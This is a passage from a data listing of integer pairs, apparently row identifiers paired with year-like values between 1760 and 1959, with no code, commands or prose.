(34722, 1855),
(34723, 1855),
(34724, 1855),
(34725, 1856),
(34726, 1856),
(34727, 1856),
(34728, 1856),
(34729, 1856),
(34730, 1856),
(34731, 1856),
(34732, 1857),
(34733, 1857),
(34734, 1857),
(34735, 1857),
(34736, 1857),
(34737, 1857),
(34738, 1857),
(34739, 1858),
(34740, 1858),
(34741, 1858),
(34742, 1858),
(34743, 1858),
(34744, 1858),
(34745, 1858),
(34746, 1859),
(34747, 1859),
(34748, 1859),
(34749, 1859),
(34750, 1859),
(34751, 1859),
(34752, 1859),
(34753, 1760),
(34754, 1761),
(34755, 1762),
(34756, 1763),
(34757, 1764),
(34758, 1765),
(34759, 1766),
(34760, 1767),
(34761, 1768),
(34762, 1769),
(34763, 1770),
(34764, 1771),
(34765, 1772),
(34766, 1773),
(34767, 1774),
(34768, 1775),
(34769, 1776),
(34770, 1777),
(34771, 1778),
(34772, 1779),
(34773, 1780),
(34774, 1781),
(34775, 1782),
(34776, 1783),
(34777, 1784),
(34778, 1785),
(34779, 1786),
(34780, 1787),
(34781, 1788),
(34782, 1789),
(34783, 1790),
(34784, 1791),
(34785, 1792),
(34786, 1793),
(34787, 1794),
(34788, 1795),
(34789, 1796),
(34790, 1797),
(34791, 1798),
(34792, 1799),
(34793, 1800),
(34794, 1801),
(34795, 1802),
(34796, 1803),
(34797, 1804),
(34798, 1805),
(34799, 1806),
(34800, 1807),
(34801, 1808),
(34802, 1809),
(34803, 1810),
(34804, 1811),
(34805, 1812),
(34806, 1813),
(34807, 1814),
(34808, 1815),
(34809, 1816),
(34810, 1817),
(34811, 1818),
(34812, 1819),
(34813, 1820),
(34814, 1821),
(34815, 1822),
(34816, 1823),
(34817, 1824),
(34818, 1825),
(34819, 1826),
(34820, 1827),
(34821, 1828),
(34822, 1829),
(34823, 1830),
(34824, 1831),
(34825, 1832),
(34826, 1833),
(34827, 1834),
(34828, 1835),
(34829, 1836),
(34830, 1837),
(34831, 1838),
(34832, 1839),
(34833, 1840),
(34834, 1841),
(34835, 1842),
(34836, 1843),
(34837, 1844),
(34838, 1845),
(34839, 1846),
(34840, 1847),
(34841, 1848),
(34842, 1849),
(34843, 1850),
(34844, 1851),
(34845, 1852),
(34846, 1853),
(34847, 1854),
(34848, 1855),
(34849, 1856),
(34850, 1857),
(34851, 1858),
(34852, 1859),
(34853, 1760),
(34854, 1760),
(34855, 1760),
(34856, 1760),
(34857, 1760),
(34858, 1760),
(34859, 1761),
(34860, 1761),
(34861, 1761),
(34862, 1761),
(34863, 1761),
(34864, 1761),
(34865, 1761),
(34866, 1761),
(34867, 1761),
(34868, 1762),
(34869, 1762),
(34870, 1762),
(34871, 1762),
(34872, 1762),
(34873, 1762),
(34874, 1763),
(34875, 1763),
(34876, 1763),
(34877, 1763),
(34878, 1763),
(34879, 1763),
(34880, 1764),
(34881, 1764),
(34882, 1764),
(34883, 1764),
(34884, 1764),
(34885, 1764),
(34886, 1765),
(34887, 1765),
(34888, 1765),
(34889, 1765),
(34890, 1765),
(34891, 1765),
(34892, 1766),
(34893, 1766),
(34894, 1766),
(34895, 1766),
(34896, 1766),
(34897, 1766),
(34898, 1767),
(34899, 1767),
(34900, 1767),
(34901, 1767),
(34902, 1767),
(34903, 1767),
(34904, 1768),
(34905, 1768),
(34906, 1768),
(34907, 1768),
(34908, 1768),
(34909, 1768),
(34910, 1769),
(34911, 1769),
(34912, 1769),
(34913, 1769),
(34914, 1769),
(34915, 1769),
(34916, 1770),
(34917, 1770),
(34918, 1770),
(34919, 1770),
(34920, 1770),
(34921, 1770),
(34922, 1771),
(34923, 1771),
(34924, 1771),
(34925, 1771),
(34926, 1771),
(34927, 1771),
(34928, 1772),
(34929, 1772),
(34930, 1772),
(34931, 1772),
(34932, 1772),
(34933, 1772),
(34934, 1773),
(34935, 1773),
(34936, 1773),
(34937, 1773),
(34938, 1773),
(34939, 1773),
(34940, 1774),
(34941, 1774),
(34942, 1774),
(34943, 1774),
(34944, 1774),
(34945, 1774),
(34946, 1775),
(34947, 1775),
(34948, 1775),
(34949, 1775),
(34950, 1775),
(34951, 1775),
(34952, 1776),
(34953, 1776),
(34954, 1776),
(34955, 1776),
(34956, 1776),
(34957, 1776),
(34958, 1777),
(34959, 1777),
(34960, 1777),
(34961, 1777),
(34962, 1777),
(34963, 1777),
(34964, 1777),
(34965, 1777),
(34966, 1777),
(34967, 1778),
(34968, 1778),
(34969, 1778),
(34970, 1778),
(34971, 1778),
(34972, 1778),
(34973, 1779),
(34974, 1779),
(34975, 1779),
(34976, 1779),
(34977, 1779),
(34978, 1779),
(34979, 1780),
(34980, 1780),
(34981, 1780),
(34982, 1780),
(34983, 1780),
(34984, 1780),
(34985, 1781),
(34986, 1781),
(34987, 1781),
(34988, 1781),
(34989, 1781),
(34990, 1781),
(34991, 1782),
(34992, 1782),
(34993, 1782),
(34994, 1782),
(34995, 1782),
(34996, 1782),
(34997, 1783),
(34998, 1783),
(34999, 1783),
(35000, 1783),
(35001, 1783),
(35002, 1783),
(35003, 1784),
(35004, 1784),
(35005, 1784),
(35006, 1784),
(35007, 1784),
(35008, 1784),
(35009, 1785),
(35010, 1785),
(35011, 1785),
(35012, 1785),
(35013, 1785),
(35014, 1785),
(35015, 1786),
(35016, 1786),
(35017, 1786),
(35018, 1786),
(35019, 1786),
(35020, 1786),
(35021, 1787),
(35022, 1787),
(35023, 1787),
(35024, 1787),
(35025, 1787),
(35026, 1787),
(35027, 1788),
(35028, 1788),
(35029, 1788),
(35030, 1788),
(35031, 1788),
(35032, 1788),
(35033, 1789),
(35034, 1789),
(35035, 1789),
(35036, 1789),
(35037, 1789),
(35038, 1789),
(35039, 1790),
(35040, 1790),
(35041, 1790),
(35042, 1790),
(35043, 1790),
(35044, 1790),
(35045, 1791),
(35046, 1791),
(35047, 1791),
(35048, 1791),
(35049, 1791),
(35050, 1791),
(35051, 1792),
(35052, 1792),
(35053, 1792),
(35054, 1792),
(35055, 1792),
(35056, 1792),
(35057, 1793),
(35058, 1793),
(35059, 1793),
(35060, 1793),
(35061, 1793),
(35062, 1793),
(35063, 1793),
(35064, 1793),
(35065, 1793),
(35066, 1794),
(35067, 1794),
(35068, 1794),
(35069, 1794),
(35070, 1794),
(35071, 1794),
(35072, 1795),
(35073, 1795),
(35074, 1795),
(35075, 1795),
(35076, 1795),
(35077, 1795),
(35078, 1796),
(35079, 1796),
(35080, 1796),
(35081, 1796),
(35082, 1796),
(35083, 1796),
(35084, 1797),
(35085, 1797),
(35086, 1797),
(35087, 1797),
(35088, 1797),
(35089, 1797),
(35090, 1798),
(35091, 1798),
(35092, 1798),
(35093, 1798),
(35094, 1798),
(35095, 1798),
(35096, 1799),
(35097, 1799),
(35098, 1799),
(35099, 1799),
(35100, 1799),
(35101, 1799),
(35102, 1800),
(35103, 1800),
(35104, 1800),
(35105, 1800),
(35106, 1800),
(35107, 1800),
(35108, 1801),
(35109, 1801),
(35110, 1801),
(35111, 1801),
(35112, 1801),
(35113, 1801),
(35114, 1802),
(35115, 1802),
(35116, 1802),
(35117, 1802),
(35118, 1802),
(35119, 1802),
(35120, 1803),
(35121, 1803),
(35122, 1803),
(35123, 1803),
(35124, 1803),
(35125, 1803),
(35126, 1804),
(35127, 1804),
(35128, 1804),
(35129, 1804),
(35130, 1804),
(35131, 1804),
(35132, 1805),
(35133, 1805),
(35134, 1805),
(35135, 1805),
(35136, 1805),
(35137, 1805),
(35138, 1806),
(35139, 1806),
(35140, 1806),
(35141, 1806),
(35142, 1806),
(35143, 1806),
(35144, 1807),
(35145, 1807),
(35146, 1807),
(35147, 1807),
(35148, 1807),
(35149, 1807),
(35150, 1808),
(35151, 1808),
(35152, 1808),
(35153, 1808),
(35154, 1808),
(35155, 1808),
(35156, 1809),
(35157, 1809),
(35158, 1809),
(35159, 1809),
(35160, 1809),
(35161, 1809),
(35162, 1809),
(35163, 1809),
(35164, 1809),
(35165, 1810),
(35166, 1810),
(35167, 1810),
(35168, 1810),
(35169, 1810),
(35170, 1810),
(35171, 1811),
(35172, 1811),
(35173, 1811),
(35174, 1811),
(35175, 1811),
(35176, 1811),
(35177, 1812),
(35178, 1812),
(35179, 1812),
(35180, 1812),
(35181, 1812),
(35182, 1812),
(35183, 1813),
(35184, 1813),
(35185, 1813),
(35186, 1813),
(35187, 1813),
(35188, 1813),
(35189, 1814),
(35190, 1814),
(35191, 1814),
(35192, 1814),
(35193, 1814),
(35194, 1814),
(35195, 1815),
(35196, 1815),
(35197, 1815),
(35198, 1815),
(35199, 1815),
(35200, 1815),
(35201, 1816),
(35202, 1816),
(35203, 1816),
(35204, 1816),
(35205, 1816),
(35206, 1816),
(35207, 1817),
(35208, 1817),
(35209, 1817),
(35210, 1817),
(35211, 1817),
(35212, 1817),
(35213, 1818),
(35214, 1818),
(35215, 1818),
(35216, 1818),
(35217, 1818),
(35218, 1818),
(35219, 1819),
(35220, 1819),
(35221, 1819),
(35222, 1819),
(35223, 1819),
(35224, 1819),
(35225, 1820),
(35226, 1820),
(35227, 1820),
(35228, 1820),
(35229, 1820),
(35230, 1820),
(35231, 1821),
(35232, 1821),
(35233, 1821),
(35234, 1821),
(35235, 1821),
(35236, 1821),
(35237, 1822),
(35238, 1822),
(35239, 1822),
(35240, 1822),
(35241, 1822),
(35242, 1822),
(35243, 1823),
(35244, 1823),
(35245, 1823),
(35246, 1823),
(35247, 1823),
(35248, 1823),
(35249, 1824),
(35250, 1824),
(35251, 1824),
(35252, 1824),
(35253, 1824),
(35254, 1824),
(35255, 1825),
(35256, 1825),
(35257, 1825),
(35258, 1825),
(35259, 1825),
(35260, 1825),
(35261, 1825),
(35262, 1825),
(35263, 1825),
(35264, 1826),
(35265, 1826),
(35266, 1826),
(35267, 1826),
(35268, 1826),
(35269, 1826),
(35270, 1827),
(35271, 1827),
(35272, 1827),
(35273, 1827),
(35274, 1827),
(35275, 1827),
(35276, 1828),
(35277, 1828),
(35278, 1828),
(35279, 1828),
(35280, 1828),
(35281, 1828),
(35282, 1829),
(35283, 1829),
(35284, 1829),
(35285, 1829),
(35286, 1829),
(35287, 1829),
(35288, 1830),
(35289, 1830),
(35290, 1830),
(35291, 1830),
(35292, 1830),
(35293, 1830),
(35294, 1831),
(35295, 1831),
(35296, 1831),
(35297, 1831),
(35298, 1831),
(35299, 1831),
(35300, 1832),
(35301, 1832),
(35302, 1832),
(35303, 1832),
(35304, 1832),
(35305, 1832),
(35306, 1832),
(35307, 1832),
(35308, 1832),
(35309, 1833),
(35310, 1833),
(35311, 1833),
(35312, 1833),
(35313, 1833),
(35314, 1833),
(35315, 1834),
(35316, 1834),
(35317, 1834),
(35318, 1834),
(35319, 1834),
(35320, 1834),
(35321, 1835),
(35322, 1835),
(35323, 1835),
(35324, 1835),
(35325, 1835),
(35326, 1835),
(35327, 1836),
(35328, 1836),
(35329, 1836),
(35330, 1836),
(35331, 1836),
(35332, 1836),
(35333, 1837),
(35334, 1837),
(35335, 1837),
(35336, 1837),
(35337, 1837),
(35338, 1837),
(35339, 1838),
(35340, 1838),
(35341, 1838),
(35342, 1838),
(35343, 1838),
(35344, 1838),
(35345, 1839),
(35346, 1839),
(35347, 1839),
(35348, 1839),
(35349, 1839),
(35350, 1839),
(35351, 1839),
(35352, 1839),
(35353, 1839),
(35354, 1840),
(35355, 1840),
(35356, 1840),
(35357, 1840),
(35358, 1840),
(35359, 1840),
(35360, 1841),
(35361, 1841),
(35362, 1841),
(35363, 1841),
(35364, 1841),
(35365, 1841),
(35366, 1842),
(35367, 1842),
(35368, 1842),
(35369, 1842),
(35370, 1842),
(35371, 1842),
(35372, 1843),
(35373, 1843),
(35374, 1843),
(35375, 1843),
(35376, 1843),
(35377, 1843),
(35378, 1844),
(35379, 1844),
(35380, 1844),
(35381, 1844),
(35382, 1844),
(35383, 1844),
(35384, 1845),
(35385, 1845),
(35386, 1845),
(35387, 1845),
(35388, 1845),
(35389, 1845),
(35390, 1846),
(35391, 1846),
(35392, 1846),
(35393, 1846),
(35394, 1846),
(35395, 1846),
(35396, 1846),
(35397, 1846),
(35398, 1846),
(35399, 1847),
(35400, 1847),
(35401, 1847),
(35402, 1847),
(35403, 1847),
(35404, 1847),
(35405, 1848),
(35406, 1848),
(35407, 1848),
(35408, 1848),
(35409, 1848),
(35410, 1848),
(35411, 1849),
(35412, 1849),
(35413, 1849),
(35414, 1849),
(35415, 1849),
(35416, 1849),
(35417, 1850),
(35418, 1850),
(35419, 1850),
(35420, 1850),
(35421, 1850),
(35422, 1850),
(35423, 1851),
(35424, 1851),
(35425, 1851),
(35426, 1851),
(35427, 1851),
(35428, 1851),
(35429, 1852),
(35430, 1852),
(35431, 1852),
(35432, 1852),
(35433, 1852),
(35434, 1852),
(35435, 1853),
(35436, 1853),
(35437, 1853),
(35438, 1853),
(35439, 1853),
(35440, 1853),
(35441, 1853),
(35442, 1853),
(35443, 1853),
(35444, 1854),
(35445, 1854),
(35446, 1854),
(35447, 1854),
(35448, 1854),
(35449, 1854),
(35450, 1855),
(35451, 1855),
(35452, 1855),
(35453, 1855),
(35454, 1855),
(35455, 1855),
(35456, 1856),
(35457, 1856),
(35458, 1856),
(35459, 1856),
(35460, 1856),
(35461, 1856),
(35462, 1857),
(35463, 1857),
(35464, 1857),
(35465, 1857),
(35466, 1857),
(35467, 1857),
(35468, 1858),
(35469, 1858),
(35470, 1858),
(35471, 1858),
(35472, 1858),
(35473, 1858),
(35474, 1859),
(35475, 1859),
(35476, 1859),
(35477, 1859),
(35478, 1859),
(35479, 1859),
(35480, 1760),
(35481, 1760),
(35482, 1761),
(35483, 1762),
(35484, 1762),
(35485, 1763),
(35486, 1763),
(35487, 1764),
(35488, 1764),
(35489, 1765),
(35490, 1765),
(35491, 1766),
(35492, 1766),
(35493, 1767),
(35494, 1767),
(35495, 1768),
(35496, 1768),
(35497, 1769),
(35498, 1769),
(35499, 1770),
(35500, 1770),
(35501, 1771),
(35502, 1771),
(35503, 1772),
(35504, 1772),
(35505, 1773),
(35506, 1773),
(35507, 1774),
(35508, 1774),
(35509, 1775),
(35510, 1775),
(35511, 1776),
(35512, 1776),
(35513, 1777),
(35514, 1778),
(35515, 1778),
(35516, 1779),
(35517, 1779),
(35518, 1780),
(35519, 1780),
(35520, 1781),
(35521, 1781),
(35522, 1782),
(35523, 1782),
(35524, 1783),
(35525, 1783),
(35526, 1784),
(35527, 1784),
(35528, 1785),
(35529, 1785),
(35530, 1786),
(35531, 1786),
(35532, 1787),
(35533, 1787),
(35534, 1788),
(35535, 1788),
(35536, 1789),
(35537, 1789),
(35538, 1790),
(35539, 1790),
(35540, 1791),
(35541, 1791),
(35542, 1792),
(35543, 1792),
(35544, 1793),
(35545, 1794),
(35546, 1794),
(35547, 1795),
(35548, 1795),
(35549, 1796),
(35550, 1796),
(35551, 1797),
(35552, 1797),
(35553, 1798),
(35554, 1798),
(35555, 1799),
(35556, 1799),
(35557, 1800),
(35558, 1800),
(35559, 1801),
(35560, 1801),
(35561, 1802),
(35562, 1802),
(35563, 1803),
(35564, 1803),
(35565, 1804),
(35566, 1804),
(35567, 1805),
(35568, 1805),
(35569, 1806),
(35570, 1806),
(35571, 1807),
(35572, 1807),
(35573, 1808),
(35574, 1808),
(35575, 1809),
(35576, 1810),
(35577, 1810),
(35578, 1811),
(35579, 1811),
(35580, 1812),
(35581, 1812),
(35582, 1813),
(35583, 1813),
(35584, 1814),
(35585, 1814),
(35586, 1815),
(35587, 1815),
(35588, 1816),
(35589, 1816),
(35590, 1817),
(35591, 1817),
(35592, 1818),
(35593, 1818),
(35594, 1819),
(35595, 1819),
(35596, 1820),
(35597, 1820),
(35598, 1821),
(35599, 1821),
(35600, 1822),
(35601, 1822),
(35602, 1823),
(35603, 1823),
(35604, 1824),
(35605, 1824),
(35606, 1825),
(35607, 1826),
(35608, 1826),
(35609, 1827),
(35610, 1827),
(35611, 1828),
(35612, 1828),
(35613, 1829),
(35614, 1829),
(35615, 1830),
(35616, 1830),
(35617, 1831),
(35618, 1831),
(35619, 1832),
(35620, 1833),
(35621, 1833),
(35622, 1834),
(35623, 1834),
(35624, 1835),
(35625, 1835),
(35626, 1836),
(35627, 1836),
(35628, 1837),
(35629, 1837),
(35630, 1838),
(35631, 1838),
(35632, 1839),
(35633, 1840),
(35634, 1840),
(35635, 1841),
(35636, 1841),
(35637, 1842),
(35638, 1842),
(35639, 1843),
(35640, 1843),
(35641, 1844),
(35642, 1844),
(35643, 1845),
(35644, 1845),
(35645, 1846),
(35646, 1847),
(35647, 1847),
(35648, 1848),
(35649, 1848),
(35650, 1849),
(35651, 1849),
(35652, 1850),
(35653, 1850),
(35654, 1851),
(35655, 1851),
(35656, 1852),
(35657, 1852),
(35658, 1853),
(35659, 1854),
(35660, 1854),
(35661, 1855),
(35662, 1855),
(35663, 1856),
(35664, 1856),
(35665, 1857),
(35666, 1857),
(35667, 1858),
(35668, 1858),
(35669, 1859),
(35670, 1859),
(35671, 1860),
(35672, 1861),
(35673, 1862),
(35674, 1863),
(35675, 1864),
(35676, 1865),
(35677, 1866),
(35678, 1867),
(35679, 1868),
(35680, 1869),
(35681, 1870),
(35682, 1871),
(35683, 1872),
(35684, 1873),
(35685, 1874),
(35686, 1875),
(35687, 1876),
(35688, 1877),
(35689, 1878),
(35690, 1879),
(35691, 1880),
(35692, 1881),
(35693, 1882),
(35694, 1883),
(35695, 1884),
(35696, 1885),
(35697, 1886),
(35698, 1887),
(35699, 1888),
(35700, 1889),
(35701, 1890),
(35702, 1891),
(35703, 1892),
(35704, 1893),
(35705, 1894),
(35706, 1895),
(35707, 1896),
(35708, 1897),
(35709, 1898),
(35710, 1899),
(35711, 1900),
(35712, 1901),
(35713, 1902),
(35714, 1903),
(35715, 1904),
(35716, 1905),
(35717, 1906),
(35718, 1907),
(35719, 1908),
(35720, 1909),
(35721, 1910),
(35722, 1911),
(35723, 1912),
(35724, 1913),
(35725, 1914),
(35726, 1915),
(35727, 1916),
(35728, 1917),
(35729, 1918),
(35730, 1919),
(35731, 1920),
(35732, 1921),
(35733, 1922),
(35734, 1923),
(35735, 1924),
(35736, 1925),
(35737, 1926),
(35738, 1927),
(35739, 1928),
(35740, 1929),
(35741, 1930),
(35742, 1931),
(35743, 1932),
(35744, 1933),
(35745, 1934),
(35746, 1935),
(35747, 1936),
(35748, 1937),
(35749, 1938),
(35750, 1939),
(35751, 1940),
(35752, 1941),
(35753, 1942),
(35754, 1943),
(35755, 1944),
(35756, 1945),
(35757, 1946),
(35758, 1947),
(35759, 1948),
(35760, 1949),
(35761, 1950),
(35762, 1951),
(35763, 1952),
(35764, 1953),
(35765, 1954),
(35766, 1955),
(35767, 1956),
(35768, 1957),
(35769, 1958),
(35770, 1959),
(35771, 1860),
(35772, 1860),
(35773, 1860),
(35774, 1861),
(35775, 1861),
(35776, 1861),
(35777, 1861),
(35778, 1862),
(35779, 1863),
(35780, 1864),
(35781, 1864),
(35782, 1864),
(35783, 1864),
(35784, 1865),
(35785, 1866),
(35786, 1867),
(35787, 1867),
(35788, 1867),
(35789, 1867),
(35790, 1868),
(35791, 1868),
(35792, 1868),
(35793, 1869),
(35794, 1870),
(35795, 1871),
(35796, 1871),
(35797, 1871),
(35798, 1872),
(35799, 1873),
(35800, 1874),
(35801, 1874),
(35802, 1874),
(35803, 1875),
(35804, 1875),
(35805, 1876),
(35806, 1877),
(35807, 1878),
(35808, 1878),
(35809, 1879),
(35810, 1880),
(35811, 1881),
(35812, 1881),
(35813, 1882),
(35814, 1882),
(35815, 1882),
(35816, 1882),
(35817, 1883),
(35818, 1884),
(35819, 1885),
(35820, 1885),
(35821, 1885),
(35822, 1885),
(35823, 1886),
(35824, 1887),
(35825, 1888),
(35826, 1888),
(35827, 1888),
(35828, 1888),
(35829, 1889),
(35830, 1890),
(35831, 1890),
(35832, 1890),
(35833, 1891),
(35834, 1892),
(35835, 1893),
(35836, 1893),
(35837, 1893),
(35838, 1894),
(35839, 1895),
(35840, 1895),
(35841, 1895),
(35842, 1896),
(35843, 1897),
(35844, 1897),
(35845, 1898),
(35846, 1899),
(35847, 1900),
(35848, 1900),
(35849, 1901),
(35850, 1902),
(35851, 1902),
(35852, 1903),
(35853, 1904),
(35854, 1904),
(35855, 1905),
(35856, 1906),
(35857, 1907),
(35858, 1907),
(35859, 1908),
(35860, 1909),
(35861, 1909),
(35862, 1910),
(35863, 1911),
(35864, 1912),
(35865, 1912),
(35866, 1913),
(35867, 1914),
(35868, 1915),
(35869, 1915),
(35870, 1916),
(35871, 1916),
(35872, 1917),
(35873, 1917),
(35874, 1918),
(35875, 1919),
(35876, 1920),
(35877, 1920),
(35878, 1921),
(35879, 1922),
(35880, 1923),
(35881, 1923),
(35882, 1924),
(35883, 1925),
(35884, 1926),
(35885, 1926),
(35886, 1927),
(35887, 1928),
(35888, 1929),
(35889, 1929),
(35890, 1930),
(35891, 1931),
(35892, 1932),
(35893, 1932),
(35894, 1933),
(35895, 1933),
(35896, 1934),
(35897, 1935),
(35898, 1936),
(35899, 1936),
(35900, 1937),
(35901, 1938),
(35902, 1939),
(35903, 1939),
(35904, 1940),
(35905, 1941),
(35906, 1942),
(35907, 1942),
(35908, 1943),
(35909, 1944),
(35910, 1945),
(35911, 1945),
(35912, 1946),
(35913, 1947),
(35914, 1948),
(35915, 1948),
(35916, 1949),
(35917, 1950),
(35918, 1950),
(35919, 1950),
(35920, 1951),
(35921, 1952),
(35922, 1953),
(35923, 1953),
(35924, 1953),
(35925, 1954),
(35926, 1955),
(35927, 1956),
(35928, 1956),
(35929, 1956),
(35930, 1957),
(35931, 1958),
(35932, 1959),
(35933, 1959),
(35934, 1959),
(35935, 1860),
(35936, 1860),
(35937, 1860),
(35938, 1860),
(35939, 1860),
(35940, 1860),
(35941, 1860),
(35942, 1860),
(35943, 1860),
(35944, 1860),
(35945, 1860),
(35946, 1861),
(35947, 1861),
(35948, 1861),
(35949, 1861),
(35950, 1861),
(35951, 1861),
(35952, 1861),
(35953, 1862),
(35954, 1862),
(35955, 1862),
(35956, 1862),
(35957, 1862),
(35958, 1862),
(35959, 1862),
(35960, 1863),
(35961, 1863),
(35962, 1863),
(35963, 1863),
(35964, 1863),
(35965, 1863),
(35966, 1863),
(35967, 1864),
(35968, 1864),
(35969, 1864),
(35970, 1864),
(35971, 1864),
(35972, 1864),
(35973, 1864),
(35974, 1865),
(35975, 1865),
(35976, 1865),
(35977, 1865),
(35978, 1865),
(35979, 1865),
(35980, 1865),
(35981, 1866),
(35982, 1866),
(35983, 1866),
(35984, 1866),
(35985, 1866),
(35986, 1866),
(35987, 1866),
(35988, 1867),
(35989, 1867),
(35990, 1867),
(35991, 1867),
(35992, 1867),
(35993, 1867),
(35994, 1867),
(35995, 1867),
(35996, 1867),
(35997, 1867),
(35998, 1867),
(35999, 1868),
(36000, 1868),
(36001, 1868),
(36002, 1868),
(36003, 1868),
(36004, 1868),
(36005, 1868),
(36006, 1869),
(36007, 1869),
(36008, 1869),
(36009, 1869),
(36010, 1869),
(36011, 1869),
(36012, 1869),
(36013, 1870),
(36014, 1870),
(36015, 1870),
(36016, 1870),
(36017, 1870),
(36018, 1870),
(36019, 1870),
(36020, 1871),
(36021, 1871),
(36022, 1871),
(36023, 1871),
(36024, 1871),
(36025, 1871),
(36026, 1871),
(36027, 1872),
(36028, 1872),
(36029, 1872),
(36030, 1872),
(36031, 1872),
(36032, 1872),
(36033, 1872),
(36034, 1873),
(36035, 1873),
(36036, 1873),
(36037, 1873),
(36038, 1873),
(36039, 1873),
(36040, 1873),
(36041, 1874),
(36042, 1874),
(36043, 1874),
(36044, 1874),
(36045, 1874),
(36046, 1874),
(36047, 1874),
(36048, 1874),
(36049, 1874),
(36050, 1874),
(36051, 1874),
(36052, 1875),
(36053, 1875),
(36054, 1875),
(36055, 1875),
(36056, 1875),
(36057, 1875),
(36058, 1875),
(36059, 1876),
(36060, 1876),
(36061, 1876),
(36062, 1876),
(36063, 1876),
(36064, 1876),
(36065, 1876),
(36066, 1877),
(36067, 1877),
(36068, 1877),
(36069, 1877),
(36070, 1877),
(36071, 1877),
(36072, 1877),
(36073, 1878),
(36074, 1878),
(36075, 1878),
(36076, 1878),
(36077, 1878),
(36078, 1878),
(36079, 1878),
(36080, 1879),
(36081, 1879),
(36082, 1879),
(36083, 1879),
(36084, 1879),
(36085, 1879),
(36086, 1879),
(36087, 1880),
(36088, 1880),
(36089, 1880),
(36090, 1880),
(36091, 1880),
(36092, 1880),
(36093, 1880),
(36094, 1881),
(36095, 1881),
(36096, 1881),
(36097, 1881),
(36098, 1881),
(36099, 1881),
(36100, 1881),
(36101, 1881),
(36102, 1881),
(36103, 1881),
(36104, 1881),
(36105, 1882),
(36106, 1882),
(36107, 1882),
(36108, 1882),
(36109, 1882),
(36110, 1882),
(36111, 1882),
(36112, 1883),
(36113, 1883),
(36114, 1883),
(36115, 1883),
(36116, 1883),
(36117, 1883),
(36118, 1883),
(36119, 1884),
(36120, 1884),
(36121, 1884),
(36122, 1884),
(36123, 1884),
(36124, 1884),
(36125, 1884),
(36126, 1885),
(36127, 1885),
(36128, 1885),
(36129, 1885),
(36130, 1885),
(36131, 1885),
(36132, 1885),
(36133, 1886),
(36134, 1886),
(36135, 1886),
(36136, 1886),
(36137, 1886),
(36138, 1886),
(36139, 1886),
(36140, 1887),
(36141, 1887),
(36142, 1887),
(36143, 1887),
(36144, 1887),
(36145, 1887),
(36146, 1887),
(36147, 1888),
(36148, 1888),
(36149, 1888),
(36150, 1888),
(36151, 1888),
(36152, 1888),
(36153, 1888),
(36154, 1888),
(36155, 1888),
(36156, 1888),
(36157, 1888),
(36158, 1889),
(36159, 1889),
(36160, 1889),
(36161, 1889),
(36162, 1889),
(36163, 1889),
(36164, 1889),
(36165, 1890),
(36166, 1890),
(36167, 1890),
(36168, 1890),
(36169, 1890),
(36170, 1890),
(36171, 1890),
(36172, 1891),
(36173, 1891),
(36174, 1891),
(36175, 1891),
(36176, 1891),
(36177, 1891),
(36178, 1891),
(36179, 1892),
(36180, 1892),
(36181, 1892),
(36182, 1892),
(36183, 1892),
(36184, 1892),
(36185, 1892),
(36186, 1893),
(36187, 1893),
(36188, 1893),
(36189, 1893),
(36190, 1893),
(36191, 1893),
(36192, 1893),
(36193, 1894),
(36194, 1894),
(36195, 1894),
(36196, 1894),
(36197, 1894),
(36198, 1894),
(36199, 1894),
(36200, 1895),
(36201, 1895),
(36202, 1895),
(36203, 1895),
(36204, 1895),
(36205, 1895),
(36206, 1895),
(36207, 1895),
(36208, 1895),
(36209, 1895),
(36210, 1895),
(36211, 1896),
(36212, 1896),
(36213, 1896),
(36214, 1896),
(36215, 1896),
(36216, 1896),
(36217, 1896),
(36218, 1897),
(36219, 1897),
(36220, 1897),
(36221, 1897),
(36222, 1897),
(36223, 1897),
(36224, 1897),
(36225, 1898),
(36226, 1898),
(36227, 1898),
(36228, 1898),
(36229, 1898),
(36230, 1898),
(36231, 1898),
(36232, 1899),
(36233, 1899),
(36234, 1899),
(36235, 1899),
(36236, 1899),
(36237, 1899),
(36238, 1899),
(36239, 1900),
(36240, 1900),
(36241, 1900),
(36242, 1900),
(36243, 1900),
(36244, 1900),
(36245, 1900),
(36246, 1901),
(36247, 1901),
(36248, 1901),
(36249, 1901),
(36250, 1901),
(36251, 1901),
(36252, 1901),
(36253, 1902),
(36254, 1902),
(36255, 1902),
(36256, 1902),
(36257, 1902),
(36258, 1902),
(36259, 1902),
(36260, 1902),
(36261, 1902),
(36262, 1902),
(36263, 1902),
(36264, 1903),
(36265, 1903),
(36266, 1903),
(36267, 1903),
(36268, 1903),
(36269, 1903),
(36270, 1903),
(36271, 1904),
(36272, 1904),
(36273, 1904),
(36274, 1904),
(36275, 1904),
(36276, 1904),
(36277, 1904),
(36278, 1905),
(36279, 1905),
(36280, 1905),
(36281, 1905),
(36282, 1905),
(36283, 1905),
(36284, 1905),
(36285, 1906),
(36286, 1906),
(36287, 1906),
(36288, 1906),
(36289, 1906),
(36290, 1906),
(36291, 1906),
(36292, 1907),
(36293, 1907),
(36294, 1907),
(36295, 1907),
(36296, 1907),
(36297, 1907),
(36298, 1907),
(36299, 1908),
(36300, 1908),
(36301, 1908),
(36302, 1908),
(36303, 1908),
(36304, 1908),
(36305, 1908),
(36306, 1909),
(36307, 1909),
(36308, 1909),
(36309, 1909),
(36310, 1909),
(36311, 1909),
(36312, 1909),
(36313, 1909),
(36314, 1909),
(36315, 1909),
(36316, 1909),
(36317, 1910),
(36318, 1910),
(36319, 1910),
(36320, 1910),
(36321, 1910),
(36322, 1910),
(36323, 1910),
(36324, 1911),
(36325, 1911),
(36326, 1911),
(36327, 1911),
(36328, 1911),
(36329, 1911),
(36330, 1911),
(36331, 1912),
(36332, 1912),
(36333, 1912),
(36334, 1912),
(36335, 1912),
(36336, 1912),
(36337, 1912),
(36338, 1913),
(36339, 1913),
(36340, 1913),
(36341, 1913),
(36342, 1913),
(36343, 1913),
(36344, 1913),
(36345, 1914),
(36346, 1914),
(36347, 1914),
(36348, 1914),
(36349, 1914),
(36350, 1914),
(36351, 1914),
(36352, 1915),
(36353, 1915),
(36354, 1915),
(36355, 1915),
(36356, 1915),
(36357, 1915),
(36358, 1915),
(36359, 1916),
(36360, 1916),
(36361, 1916),
(36362, 1916),
(36363, 1916),
(36364, 1916),
(36365, 1916),
(36366, 1916),
(36367, 1916),
(36368, 1916),
(36369, 1916),
(36370, 1917),
(36371, 1917),
(36372, 1917),
(36373, 1917),
(36374, 1917),
(36375, 1917),
(36376, 1917),
(36377, 1918),
(36378, 1918),
(36379, 1918),
(36380, 1918),
(36381, 1918),
(36382, 1918),
(36383, 1918),
(36384, 1919),
(36385, 1919),
(36386, 1919),
(36387, 1919),
